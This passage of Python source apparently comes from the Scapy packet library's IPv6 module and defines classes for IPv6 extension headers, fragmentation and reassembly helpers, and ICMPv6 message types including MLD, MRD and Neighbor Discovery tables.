    """Home Address Option carrying one IPv6 address ('hoa')."""
    name = "Home Address Option"
    fields_desc = [
        _OTypeField("otype", 0xC9, _hbhopts),
        ByteField("optlen", 16),
        IP6Field("hoa", "::"),
    ]

    def alignment_delta(self, curpos):  # alignment requirement : 8n+6
        """Number of padding bytes needed so the option starts at 8n+6."""
        multiple, offset = 8, 6
        # Distance from curpos up to the next position of the form
        # multiple*n + offset (0 when curpos already qualifies)
        return (offset - curpos) % multiple
|
|
# Option type value -> class used to dissect that option
_hbhoptcls = {
    0x00: Pad1,
    0x01: PadN,
    0x05: RouterAlert,
    0xC2: Jumbo,
    0xC9: HAO,
}
|
|
|
######################## Hop-by-Hop Extension Header ########################
|
|
class _HopByHopOptionsField(PacketListField):
    """List of options of a Hop-by-Hop or Destination Options header.

    'curpos' is the offset of the first option from the start of the
    enclosing header; it is the starting point of the alignment and padding
    computations done when building.
    """
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)

    @staticmethod
    def _padding(length):
        """Return 'length' bytes of padding: Pad1 for 1, PadN otherwise."""
        if length == 1:
            return raw(Pad1())
        if length != 0:
            # PadN already takes 2 bytes for its type and length
            return raw(PadN(optdata=b'\x00' * (length - 2)))
        return b""

    def i2len(self, pkt, i):
        """Length of the built options, padding included."""
        return len(self.i2m(pkt, i))

    def i2count(self, pkt, i):
        """Number of options (0 when the value is not a list)."""
        if isinstance(i, list):
            return len(i)
        return 0

    def getfield(self, pkt, s):
        """Dissect options from s; return (remaining bytes, option list)."""
        c = l = None
        if self.length_from is not None:
            l = self.length_from(pkt)
        elif self.count_from is not None:
            c = self.count_from(pkt)

        opt = []
        ret = b""
        x = s
        if l is not None:
            x, ret = s[:l], s[l:]
        while x:
            if c is not None:
                if c <= 0:
                    break
                c -= 1
            o = orb(x[0])  # Option type
            cls = self.cls
            if o in _hbhoptcls:
                cls = _hbhoptcls[o]
            try:
                op = cls(x)
            except Exception:
                # The dedicated class failed: use the generic option class
                op = self.cls(x)
            opt.append(op)
            if isinstance(op.payload, conf.raw_layer):
                # What the option did not consume holds the next options
                x = op.payload.load
                del(op.payload)
            else:
                x = b""
        return x + ret, opt

    def i2m(self, pkt, x):
        """Build the options, inserting padding unless autopad is off."""
        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            autopad = 1

        if not autopad:
            # raw(), not str(): str() of a packet is not bytes on Python 3
            return b"".join(map(raw, x))

        curpos = self.curpos
        chunks = []
        for p in x:
            # Pad up to the alignment required by this option
            d = p.alignment_delta(curpos)
            curpos += d
            chunks.append(self._padding(d))
            pstr = raw(p)
            curpos += len(pstr)
            chunks.append(pstr)

        # Let's make the class including our option field
        # a multiple of 8 octets long
        d = curpos % 8
        if d != 0:
            chunks.append(self._padding(8 - d))

        return b"".join(chunks)

    def addfield(self, pkt, s, val):
        return s + self.i2m(pkt, val)
|
|
class _PhantomAutoPadField(ByteField):
    """Field that takes no room on the wire.

    Building adds nothing and dissecting consumes nothing (the dissected
    value is always 1).
    """

    def addfield(self, pkt, s, val):
        # Nothing is emitted for this field
        return s

    def getfield(self, pkt, s):
        # Nothing is consumed; the value is always 1
        return s, 1

    def i2repr(self, pkt, x):
        return "On" if x else "Off"
|
|
|
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
    """Hop-by-Hop Options extension header (next header value 0)."""
    name = "IPv6 Extension Header - Hop-by-Hop Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # 'len' is in 8-byte units, not counting the first 8 bytes;
        # the +2 accounts for the nh and len bytes
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _HopByHopOptionsField("options", [], HBHOptUnknown, 2,
                              length_from=lambda pkt: (8 * (pkt.len + 1)) - 2),
    ]
    overload_fields = {IPv6: {"nh": 0}}
|
|
|
######################## Destination Option Header ##########################
|
|
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
    """Destination Options extension header (next header value 60)."""
    name = "IPv6 Extension Header - Destination Options Header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # 'len' is in 8-byte units, not counting the first 8 bytes;
        # the +2 accounts for the nh and len bytes
        FieldLenField("len", None, length_of="options", fmt="B",
                      adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _HopByHopOptionsField("options", [], HBHOptUnknown, 2,
                              length_from=lambda pkt: (8 * (pkt.len + 1)) - 2),
    ]
    overload_fields = {IPv6: {"nh": 60}}
|
|
|
############################# Routing Header ################################
|
|
class IPv6ExtHdrRouting(_IPv6ExtHdr):
    """Routing extension header (next header value 43)."""
    name = "IPv6 Option Header Routing"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        FieldLenField("len", None, count_of="addresses", fmt="B",
                      adjust=lambda pkt, x: 2 * x),  # in 8 bytes blocks
        ByteField("type", 0),
        ByteField("segleft", None),
        BitField("reserved", 0, 32),  # There is meaning in this field ...
        IP6ListField("addresses", [],
                     length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Fill 'segleft' with the number of addresses when left to None."""
        if self.segleft is None:
            # segleft is the 4th byte of the header
            segleft_byte = struct.pack("B", len(self.addresses))
            pkt = b"".join((pkt[:3], segleft_byte, pkt[4:]))
        return _IPv6ExtHdr.post_build(self, pkt, pay)
|
|
|
######################### Segment Routing Header ############################
|
|
# This implementation is based on draft 06, available at:
|
# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
|
|
class IPv6ExtHdrSegmentRoutingTLV(Packet):
    """Generic Segment Routing TLV, and dispatcher towards registered ones."""
    name = "IPv6 Option Header Segment Routing - Generic TLV"
    fields_desc = [
        ByteField("type", 0),
        ByteField("len", 0),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        StrLenField("value", "", length_from=lambda pkt: pkt.len),
    ]

    def extract_padding(self, p):
        # Nothing is kept as payload: what follows is handed back
        return b"", p

    # TLV type value -> class; shared by the class and its subclasses
    registered_sr_tlv = {}

    @classmethod
    def register_variant(cls):
        """Record cls under the default value of its 'type' field."""
        cls.registered_sr_tlv[cls.type.default] = cls

    @classmethod
    def dispatch_hook(cls, pkt=None, *args, **kargs):
        """Select the class registered for the first byte of pkt, if any."""
        if not pkt:
            return cls
        return cls.registered_sr_tlv.get(orb(pkt[0]), cls)
|
|
|
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
    """Segment Routing TLV of type 1, carrying one IPv6 address."""
    name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
    fields_desc = [
        ByteField("type", 1),
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("ingress_node", "::1"),
    ]
|
|
|
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
    """Segment Routing TLV of type 2 carrying an egress node address."""
    name = "IPv6 Option Header Segment Routing - Egress Node TLV"
    fields_desc = [
        ByteField("type", 2),
        ByteField("len", 18),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        IP6Field("egress_node", "::1"),
    ]
|
|
|
class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV):
    """Segment Routing TLV of type 4 holding padding bytes.

    ``len`` is computed from the length of ``padding`` when left to None.
    """
    name = "IPv6 Option Header Segment Routing - Padding TLV"
    fields_desc = [
        ByteField("type", 4),
        FieldLenField("len", None, length_of="padding", fmt="B"),
        StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len),
    ]
|
|
|
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
    """IPv6 Segment Routing extension header (routing type 4).

    ``len``, ``segleft`` and ``lastentry`` are computed in post_build()
    when they are left to None.
    """
    name = "IPv6 Option Header Segment Routing"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteField("type", 4),
        ByteField("segleft", None),
        ByteField("lastentry", None),
        BitField("unused1", 0, 1),
        BitField("protected", 0, 1),
        BitField("oam", 0, 1),
        BitField("alert", 0, 1),
        BitField("hmac", 0, 1),
        BitField("unused2", 0, 3),
        ShortField("tag", 0),
        IP6ListField("addresses", ["::1"],
                     count_from=lambda pkt: pkt.lastentry),
        PacketListField("tlv_objects", [], IPv6ExtHdrSegmentRoutingTLV,
                        length_from=lambda pkt: 8 * pkt.len - 16 * pkt.lastentry),
    ]

    overload_fields = {IPv6: {"nh": 43}}

    def post_build(self, pkt, pay):
        """Pad the header to an 8-byte boundary and fill automatic fields.

        :param pkt: the built bytes of this layer
        :param pay: the built bytes of the payload
        :return: the result of _IPv6ExtHdr.post_build() on the fixed header
        """
        if self.len is None:
            # The extension must be aligned on 8 bytes: compute how many
            # bytes are missing to reach the next boundary (not how many
            # bytes overshoot the previous one).
            missing = (-len(pkt)) % 8
            if missing == 1:
                # A padding TLV is at least 2 bytes long (type + len)
                warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte !")
            elif missing >= 2:
                # Add the padding extension: 2 header bytes + filler
                tmp_pad = b"\x00" * (missing - 2)
                tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad)
                pkt += raw(tlv)

            # Length in 8-byte units, first 8 bytes excluded
            tmp_len = (len(pkt) - 8) // 8
            pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]

        if self.segleft is None:
            # Address count minus one, but never below zero
            tmp_len = len(self.addresses)
            if tmp_len:
                tmp_len -= 1
            pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]

        if self.lastentry is None:
            pkt = pkt[:4] + struct.pack("B", len(self.addresses)) + pkt[5:]

        return _IPv6ExtHdr.post_build(self, pkt, pay)
|
|
|
########################### Fragmentation Header ############################
|
|
class IPv6ExtHdrFragment(_IPv6ExtHdr):
    """IPv6 Fragment extension header (next header value 44)."""
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        BitField("res1", 0, 8),
        BitField("offset", 0, 13),
        BitField("res2", 0, 2),
        BitField("m", 0, 1),
        IntField("id", None),
    ]
    overload_fields = {IPv6: {"nh": 44}}
|
|
|
def defragment6(packets):
    """
    Performs defragmentation of a list of IPv6 packets. Packets are reordered.
    Crap is dropped. What lacks is completed by 'X' characters.

    Only packets carrying an IPv6ExtHdrFragment and sharing the fragment id
    of the first such packet are used. Returns the reassembled IPv6 packet,
    or an empty list when no fragment is found. The provided packets are
    left untouched.
    """

    # remove non fragments
    frags = [x for x in packets if IPv6ExtHdrFragment in x]
    if not frags:
        return []

    # keep only the fragments belonging to the same datagram as the first one
    frag_id = frags[0][IPv6ExtHdrFragment].id
    same_id = [x for x in frags if x[IPv6ExtHdrFragment].id == frag_id]
    if len(same_id) != len(frags):
        warning("defragment6: some fragmented packets have been removed from list")

    # reorder fragments by increasing offset (stable for equal offsets)
    res = sorted(same_id, key=lambda x: x[IPv6ExtHdrFragment].offset)

    # regenerate the fragmentable part
    fragmentable = b""
    for p in res:
        q = p[IPv6ExtHdrFragment]
        offset = 8 * q.offset
        if offset != len(fragmentable):
            warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
        # fill the hole, if any (a non-positive count yields nothing)
        fragmentable += b"X" * (offset - len(fragmentable))
        fragmentable += raw(q.payload)

    # Regenerate the unfragmentable part, working on a copy so that the
    # caller's first fragment is not modified.
    q = res[0].copy()
    nh = q[IPv6ExtHdrFragment].nh
    q[IPv6ExtHdrFragment].underlayer.nh = nh
    del q[IPv6ExtHdrFragment].underlayer.payload
    q /= conf.raw_layer(load=fragmentable)

    return IPv6(raw(q))
|
|
|
def fragment6(pkt, fragSize):
    """
    Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already
    contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected
    maximum size of fragments (MTU). The list of packets is returned.

    If packet does not contain an IPv6ExtHdrFragment class, it is returned in
    result list.
    """

    pkt = pkt.copy()

    if IPv6ExtHdrFragment not in pkt:
        # TODO : automatically add a fragment before upper Layer
        #        at the moment, we do nothing and return initial packet
        #        as single element of a list
        return [pkt]

    # If the payload is bigger than 65535, a Jumbo payload must be used, as
    # an IPv6 packet can't be bigger than 65535 bytes.
    if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
        warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")
        return []

    # Build once so that the upper layer checksum is right
    serialized = raw(pkt)
    if len(serialized) <= fragSize:
        return [pkt]

    # Fragmentable part: a fake IPv6 header is used to compute its length
    frag_payload = pkt[IPv6ExtHdrFragment].payload
    fake = raw(IPv6(src="::1", dst="::1") / frag_payload)
    frag_len = len(fake) - 40  # basic IPv6 header length
    frag_bytes = serialized[-frag_len:]

    # Next Header value, reused in every Fragment header
    nh = pkt[IPv6ExtHdrFragment].nh

    # Keep the fragment header, detached from its payload
    frag_hdr = pkt[IPv6ExtHdrFragment]
    del frag_hdr.payload

    # Unfragmentable part: everything before the Fragment header
    unfrag_len = len(serialized) - frag_len - 8
    unfrag = pkt
    del pkt[IPv6ExtHdrFragment].underlayer.payload

    # Cut the fragmentable part to fit fragSize. Inner fragments have
    # a length that is an integer multiple of 8 octets. The last fragment
    # can be anything below the MTU.
    last_size = fragSize - unfrag_len - 8
    inner_size = last_size - (last_size % 8)

    if last_size <= 0 or inner_size == 0:
        warning("Provided fragment size value is too low. Should be more than %d" % (unfrag_len + 8))
        return [unfrag / frag_hdr / frag_payload]

    remain = frag_bytes
    res = []
    offset = 0  # in 8-byte units, incremented for each inner fragment
    frag_id = random.randint(0, 0xffffffff)  # random id ...
    if frag_hdr.id is not None:  # ... except id provided by user
        frag_id = frag_hdr.id
    frag_hdr.m = 1
    frag_hdr.id = frag_id
    frag_hdr.nh = nh

    # Inner fragments: as long as what remains does not fit in the last one
    while len(remain) > last_size:
        chunk, remain = remain[:inner_size], remain[inner_size:]
        frag_hdr.offset = offset
        offset += inner_size // 8
        if IPv6 in unfrag:
            unfrag[IPv6].plen = None
        res.append(unfrag / frag_hdr / conf.raw_layer(load=chunk))

    # Last fragment: M flag cleared, carries whatever is left
    frag_hdr.offset = offset
    frag_hdr.m = 0
    if IPv6 in unfrag:
        unfrag[IPv6].plen = None
    res.append(unfrag / frag_hdr / conf.raw_layer(load=remain))

    return res
|
|
|
############################### AH Header ###################################
|
|
# class _AHFieldLenField(FieldLenField):
|
# def getfield(self, pkt, s):
|
# l = getattr(pkt, self.fld)
|
# l = (l*8)-self.shift
|
# i = self.m2i(pkt, s[:l])
|
# return s[l:],i
|
|
# class _AHICVStrLenField(StrLenField):
|
# def i2len(self, pkt, x):
|
|
|
|
# class IPv6ExtHdrAH(_IPv6ExtHdr):
|
# name = "IPv6 Extension Header - AH"
|
# fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
|
# _AHFieldLenField("len", None, "icv"),
|
# ShortField("res", 0),
|
# IntField("spi", 0),
|
# IntField("sn", 0),
|
# _AHICVStrLenField("icv", None, "len", shift=2) ]
|
# overload_fields = {IPv6: { "nh": 51 }}
|
|
# def post_build(self, pkt, pay):
|
# if self.len is None:
|
# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
|
# if self.segleft is None:
|
# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
|
# return _IPv6ExtHdr.post_build(self, pkt, pay)
|
|
|
############################### ESP Header ##################################
|
|
# class IPv6ExtHdrESP(_IPv6extHdr):
|
# name = "IPv6 Extension Header - ESP"
|
# fields_desc = [ IntField("spi", 0),
|
# IntField("sn", 0),
|
# # there is things to extract from IKE work
|
# ]
|
# overloads_fields = {IPv6: { "nh": 50 }}
|
|
|
|
#############################################################################
|
#############################################################################
|
### ICMPv6* Classes ###
|
#############################################################################
|
#############################################################################
|
|
# ICMPv6 type value -> name of the class that implements it
icmp6typescls = {
    1: "ICMPv6DestUnreach",
    2: "ICMPv6PacketTooBig",
    3: "ICMPv6TimeExceeded",
    4: "ICMPv6ParamProblem",
    128: "ICMPv6EchoRequest",
    129: "ICMPv6EchoReply",
    130: "ICMPv6MLQuery",
    131: "ICMPv6MLReport",
    132: "ICMPv6MLDone",
    133: "ICMPv6ND_RS",
    134: "ICMPv6ND_RA",
    135: "ICMPv6ND_NS",
    136: "ICMPv6ND_NA",
    137: "ICMPv6ND_Redirect",
    # 138: Do Me - RFC 2894 - Seems painful
    139: "ICMPv6NIQuery",
    140: "ICMPv6NIReply",
    141: "ICMPv6ND_INDSol",
    142: "ICMPv6ND_INDAdv",
    # 143: Do Me - RFC 3810
    144: "ICMPv6HAADRequest",
    145: "ICMPv6HAADReply",
    146: "ICMPv6MPSol",
    147: "ICMPv6MPAdv",
    # 148: Do Me - SEND related - RFC 3971
    # 149: Do Me - SEND related - RFC 3971
    151: "ICMPv6MRD_Advertisement",
    152: "ICMPv6MRD_Solicitation",
    153: "ICMPv6MRD_Termination",
}
|
|
# ICMPv6 type value -> minimal header length, in bytes
icmp6typesminhdrlen = {
    1: 8,
    2: 8,
    3: 8,
    4: 8,
    128: 8,
    129: 8,
    130: 24,
    131: 24,
    132: 24,
    133: 8,
    134: 16,
    135: 24,
    136: 24,
    137: 40,
    # 139:
    # 140
    141: 8,
    142: 8,
    144: 8,
    145: 8,
    146: 8,
    147: 8,
    151: 8,
    152: 4,
    153: 4,
}
|
|
# ICMPv6 type value -> human readable description
icmp6types = {
    1: "Destination unreachable",
    2: "Packet too big",
    3: "Time exceeded",
    4: "Parameter problem",
    100: "Private Experimentation",
    101: "Private Experimentation",
    128: "Echo Request",
    129: "Echo Reply",
    130: "MLD Query",
    131: "MLD Report",
    132: "MLD Done",
    133: "Router Solicitation",
    134: "Router Advertisement",
    135: "Neighbor Solicitation",
    136: "Neighbor Advertisement",
    137: "Redirect Message",
    138: "Router Renumbering",
    139: "ICMP Node Information Query",
    140: "ICMP Node Information Response",
    141: "Inverse Neighbor Discovery Solicitation Message",
    142: "Inverse Neighbor Discovery Advertisement Message",
    143: "Version 2 Multicast Listener Report",
    144: "Home Agent Address Discovery Request Message",
    145: "Home Agent Address Discovery Reply Message",
    146: "Mobile Prefix Solicitation",
    147: "Mobile Prefix Advertisement",
    148: "Certification Path Solicitation",
    149: "Certification Path Advertisement",
    151: "Multicast Router Advertisement",
    152: "Multicast Router Solicitation",
    153: "Multicast Router Termination",
    200: "Private Experimentation",
    201: "Private Experimentation",
}
|
|
|
class _ICMPv6(Packet):
    """Base class of ICMPv6 messages: checksum computation and matching."""
    name = "ICMPv6 dummy class"
    overload_fields = {IPv6: {"nh": 58}}

    def post_build(self, p, pay):
        """Append the payload and compute the checksum when it is unset.

        The checksum is stored in bytes 2-3 of the built message.
        """
        p += pay
        if self.cksum is None:
            chksum = in6_chksum(58, self.underlayer, p)
            p = p[:2] + struct.pack("!H", chksum) + p[4:]
        return p

    def hashret(self):
        """Delegate the hash to the payload."""
        return self.payload.hashret()

    def answers(self, other):
        """Return 1 when type and code match those of ``other``, else 0.

        Matching is only attempted when the underlayer is an IPerror6, or
        when it is an extension header and ``other`` is an ICMPv6 message.
        """
        # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
        # Parentheses make the existing "A or (B and C)" precedence explicit.
        if (isinstance(self.underlayer, IPerror6) or
                (isinstance(self.underlayer, _IPv6ExtHdr) and
                 isinstance(other, _ICMPv6))):
            if not ((self.type == other.type) and
                    (self.code == other.code)):
                return 0
            return 1
        return 0
|
|
|
class _ICMPv6Error(_ICMPv6):
    """Base class of ICMPv6 error messages; payload is always IPerror6."""
    name = "ICMPv6 errors dummy class"

    def guess_payload_class(self, p):
        """Return IPerror6, whatever the payload bytes are."""
        return IPerror6
|
|
class ICMPv6Unknown(_ICMPv6):
    """Fallback ICMPv6 message: the body is kept as an opaque string."""
    name = "Scapy6 ICMPv6 fallback class"
    fields_desc = [
        ByteEnumField("type", 1, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        StrField("msgbody", ""),
    ]
|
|
|
################################## RFC 2460 #################################
|
|
class ICMPv6DestUnreach(_ICMPv6Error):
    """ICMPv6 Destination Unreachable error message (type 1)."""
    name = "ICMPv6 Destination Unreachable"
    fields_desc = [
        ByteEnumField("type", 1, icmp6types),
        ByteEnumField("code", 0, {
            0: "No route to destination",
            1: "Communication with destination administratively prohibited",
            2: "Beyond scope of source address",
            3: "Address unreachable",
            4: "Port unreachable",
        }),
        XShortField("cksum", None),
        ByteField("length", 0),
        X3BytesField("unused", 0),
    ]
|
|
class ICMPv6PacketTooBig(_ICMPv6Error):
    """ICMPv6 Packet Too Big error message (type 2)."""
    name = "ICMPv6 Packet Too Big"
    fields_desc = [
        ByteEnumField("type", 2, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("mtu", 1280),
    ]
|
|
class ICMPv6TimeExceeded(_ICMPv6Error):
    """ICMPv6 Time Exceeded error message (type 3)."""
    name = "ICMPv6 Time Exceeded"
    fields_desc = [
        ByteEnumField("type", 3, icmp6types),
        ByteEnumField("code", 0, {
            0: "hop limit exceeded in transit",
            1: "fragment reassembly time exceeded",
        }),
        XShortField("cksum", None),
        ByteField("length", 0),
        X3BytesField("unused", 0),
    ]
|
|
# The default pointer value is set to the next header field of
|
# the encapsulated IPv6 packet
|
class ICMPv6ParamProblem(_ICMPv6Error):
    """ICMPv6 Parameter Problem error message (type 4).

    ``ptr`` defaults to 6, the offset of the next header field of the
    encapsulated IPv6 packet.
    """
    name = "ICMPv6 Parameter Problem"
    fields_desc = [
        ByteEnumField("type", 4, icmp6types),
        ByteEnumField("code", 0, {
            0: "erroneous header field encountered",
            1: "unrecognized Next Header type encountered",
            2: "unrecognized IPv6 option encountered",
        }),
        XShortField("cksum", None),
        IntField("ptr", 6),
    ]
|
|
class ICMPv6EchoRequest(_ICMPv6):
    """ICMPv6 Echo Request message (type 128)."""
    name = "ICMPv6 Echo Request"
    fields_desc = [
        ByteEnumField("type", 128, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", 0),
        XShortField("seq", 0),
        StrField("data", ""),
    ]

    def mysummary(self):
        """Summary line showing the identifier and sequence number."""
        return self.sprintf("%name% (id: %id% seq: %seq%)")

    def hashret(self):
        """Hash on id and seq, followed by the payload hash."""
        ident = struct.pack("HH", self.id, self.seq)
        return ident + self.payload.hashret()
|
|
|
class ICMPv6EchoReply(ICMPv6EchoRequest):
    """ICMPv6 Echo Reply message (type 129)."""
    name = "ICMPv6 Echo Reply"
    type = 129

    def answers(self, other):
        """True when ``other`` is an Echo Request with same id, seq and data."""
        if not isinstance(other, ICMPv6EchoRequest):
            return False
        return (self.id == other.id and
                self.seq == other.seq and
                self.data == other.data)
|
|
|
############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
|
|
# All MLD messages are sent with a link-local source address
# -> take care of it in post_build if none is specified
# The Hop-Limit value must be 1
|
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
|
# header. (The router alert option is necessary to cause routers to
|
# examine MLD messages sent to multicast addresses in which the router
|
# itself has no interest"
|
class _ICMPv6ML(_ICMPv6):
    """Common field layout of the MLD Query, Report and Done messages."""
    fields_desc = [
        ByteEnumField("type", 130, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ShortField("mrd", 0),
        ShortField("reserved", 0),
        IP6Field("mladdr", "::"),
    ]
|
|
# general queries are sent to the link-scope all-nodes multicast
|
# address ff02::1, with a multicast address field of 0 and a MRD of
|
# [Query Response Interval]
|
# Default value for mladdr is set to 0 for a General Query, and
|
# overloaded by the user for a Multicast Address specific query
|
# TODO : See what we can do to automatically include a Router Alert
|
# Option in a Destination Option Header.
|
class ICMPv6MLQuery(_ICMPv6ML):  # RFC 2710
    """MLD Multicast Listener Query (type 130), sent to ff02::1 by default."""
    name = "MLD - Multicast Listener Query"
    type = 130
    mrd = 10000  # 10s for mrd
    mladdr = "::"
    overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}

    def hashret(self):
        """Prefix the payload hash with mladdr, unless it is "::"."""
        if self.mladdr == "::":
            return self.payload.hashret()
        packed_addr = inet_pton(socket.AF_INET6, self.mladdr)
        return packed_addr + self.payload.hashret()
|
|
|
# TODO : See what we can do to automatically include a Router Alert
|
# Option in a Destination Option Header.
|
class ICMPv6MLReport(_ICMPv6ML):  # RFC 2710
    """MLD Multicast Listener Report (type 131)."""
    name = "MLD - Multicast Listener Report"
    type = 131
    overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
    # TODO: implement hashret and answers
|
|
# When a node ceases to listen to a multicast address on an interface,
|
# it SHOULD send a single Done message to the link-scope all-routers
|
# multicast address (FF02::2), carrying in its multicast address field
|
# the address to which it is ceasing to listen
|
# TODO : See what we can do to automatically include a Router Alert
|
# Option in a Destination Option Header.
|
class ICMPv6MLDone(_ICMPv6ML):  # RFC 2710
    """MLD Multicast Listener Done (type 132), sent to ff02::2 by default."""
    name = "MLD - Multicast Listener Done"
    type = 132
    overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
|
|
|
########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
|
|
# TODO:
|
# - 04/09/06 troglocan : find a way to automatically add a router alert
|
# option for all MRD packets. This could be done in a specific
|
# way when IPv6 is the under layer with some specific keyword
|
# like 'exthdr'. This would allow to keep compatibility with
|
# providing IPv6 fields to be overloaded in fields_desc.
|
#
|
# At the moment, if user inserts an IPv6 Router alert option
|
# none of the IPv6 default values of IPv6 layer will be set.
|
|
class ICMPv6MRD_Advertisement(_ICMPv6):
    """Multicast Router Discovery Advertisement (type 151)."""
    name = "ICMPv6 Multicast Router Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 151, icmp6types),
        ByteField("advinter", 20),
        XShortField("cksum", None),
        ShortField("queryint", 0),
        ShortField("robustness", 0),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}

    def extract_padding(self, s):
        """Keep the first 8 bytes; what follows is padding."""
        head, tail = s[:8], s[8:]
        return head, tail
|
|
class ICMPv6MRD_Solicitation(_ICMPv6):
    """Multicast Router Discovery Solicitation (type 152)."""
    name = "ICMPv6 Multicast Router Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 152, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}

    def extract_padding(self, s):
        """Keep the first 4 bytes; what follows is padding."""
        head, tail = s[:4], s[4:]
        return head, tail
|
|
class ICMPv6MRD_Termination(_ICMPv6):
    """Multicast Router Discovery Termination (type 153)."""
    name = "ICMPv6 Multicast Router Discovery Termination"
    fields_desc = [
        ByteEnumField("type", 153, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}

    def extract_padding(self, s):
        """Keep the first 4 bytes; what follows is padding."""
        head, tail = s[:4], s[4:]
        return head, tail
|
|
|
################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
|
|
# Neighbor Discovery option type -> human readable description
icmp6ndopts = {
    1: "Source Link-Layer Address",
    2: "Target Link-Layer Address",
    3: "Prefix Information",
    4: "Redirected Header",
    5: "MTU",
    6: "NBMA Shortcut Limit Option",  # RFC2491
    7: "Advertisement Interval Option",
    8: "Home Agent Information Option",
    9: "Source Address List",
    10: "Target Address List",
    11: "CGA Option",  # RFC 3971
    12: "RSA Signature Option",  # RFC 3971
    13: "Timestamp Option",  # RFC 3971
    14: "Nonce option",  # RFC 3971
    15: "Trust Anchor Option",  # RFC 3971
    16: "Certificate Option",  # RFC 3971
    17: "IP Address Option",  # RFC 4068
    18: "New Router Prefix Information Option",  # RFC 4068
    19: "Link-layer Address Option",  # RFC 4068
    20: "Neighbor Advertisement Acknowledgement Option",
    21: "CARD Request Option",  # RFC 4065/4066/4067
    22: "CARD Reply Option",  # RFC 4065/4066/4067
    23: "MAP Option",  # RFC 4140
    24: "Route Information Option",  # RFC 4191
    25: "Recusive DNS Server Option",
    26: "IPv6 Router Advertisement Flags Option",
}
|
|
# Neighbor Discovery option type -> name of the class that implements it
icmp6ndoptscls = {
    1: "ICMPv6NDOptSrcLLAddr",
    2: "ICMPv6NDOptDstLLAddr",
    3: "ICMPv6NDOptPrefixInfo",
    4: "ICMPv6NDOptRedirectedHdr",
    5: "ICMPv6NDOptMTU",
    6: "ICMPv6NDOptShortcutLimit",
    7: "ICMPv6NDOptAdvInterval",
    8: "ICMPv6NDOptHAInfo",
    9: "ICMPv6NDOptSrcAddrList",
    10: "ICMPv6NDOptTgtAddrList",
    # 11 to 16: Do Me
    17: "ICMPv6NDOptIPAddr",
    18: "ICMPv6NDOptNewRtrPrefix",
    19: "ICMPv6NDOptLLA",
    # 20 to 22: Do Me
    23: "ICMPv6NDOptMAP",
    24: "ICMPv6NDOptRouteInfo",
    25: "ICMPv6NDOptRDNSS",
    26: "ICMPv6NDOptEFA",
    31: "ICMPv6NDOptDNSSL",
}
|
|
class _ICMPv6NDGuessPayload:
    """Mixin picking the Neighbor Discovery option class of the payload."""
    name = "Dummy ND class that implements guess_payload_class()"

    def guess_payload_class(self, p):
